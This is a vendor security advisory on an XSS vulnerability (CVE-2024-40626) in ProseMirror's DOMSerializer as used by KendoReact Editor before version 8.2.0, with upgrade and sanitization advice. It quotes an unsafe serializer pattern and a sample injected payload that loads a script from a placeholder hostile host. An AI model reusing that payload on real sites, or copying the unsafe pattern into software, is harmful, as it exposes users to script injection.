Protect your application from a XSS vulnerability in the ProseMirror Engine
Environment
| Product Version | Prior to 8.2.0 |
| Product | Progress® KendoReact Editor |
Description
We want to bring your attention to a critical security issue that may affect your use of the KendoReact Editor component, especially if you've customized its schema using ProseMirror. This article explains the Cross-Site Scripting (XSS) vulnerabilities that exist and provides steps to mitigate the risk.
A Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-40626 vulnerability, has been found in ProseMirror’s DOMSerializer. This vulnerability could expose your application to malicious attacks if you are customizing the KendoReact Editor’s schema by creating custom nodes or marks, particularly in versions prior to 8.2.0.
This KB article also answers the following questions:
- How to prevent XSS vulnerabilities in
KendoReact Editor? - How to secure custom ProseMirror schema from XSS attacks in
KendoReact Editor? - What is the CVE-2024-40626 vulnerability in
KendoReact Editor, and how to fix it?
Problematic Scenario
Imagine you're adding a custom node type to the KendoReact Editor. Without thorough validation and sanitization, a malicious user could craft input that, once serialized by ProseMirror, injects a script that runs in your users' browsers, leading to significant security issues.
You have a node or mark serializer function (e.g., a toDOM spec or a function passed to the DOMSerializer) that places a value from an attribute directly into an array used to describe the DOM structure.
(node) => ['span', node.attrs.label];An attacker could inject something like attrs: {label: ["script", {src: "//dodgy.com/script.js"}]} into your document through a tampered API request. The DOMSerializer might then emit arbitrary HTML tags, which could lead to malicious code being executed when the content is rendered by the browser.
Solution
- Upgrade to KendoReact Editor 8.2.0 or Later version. The XSS vulnerability has been fixed in version 8.2.0. To protect your application, you should upgrade to this version or any later release.
- Sanitize the Input. Even after upgrading, you should continue to follow best practices for sanitizing and validating all user input. If you have extended the editor’s schema with custom nodes, ensure the data is sanitized both when it's entered and when it's serialized into the DOM.
- Review any custom nodes or marks you have added. Be especially cautious with features involving user-generated content. Handling untrusted input without proper sanitization can expose your application to XSS attacks.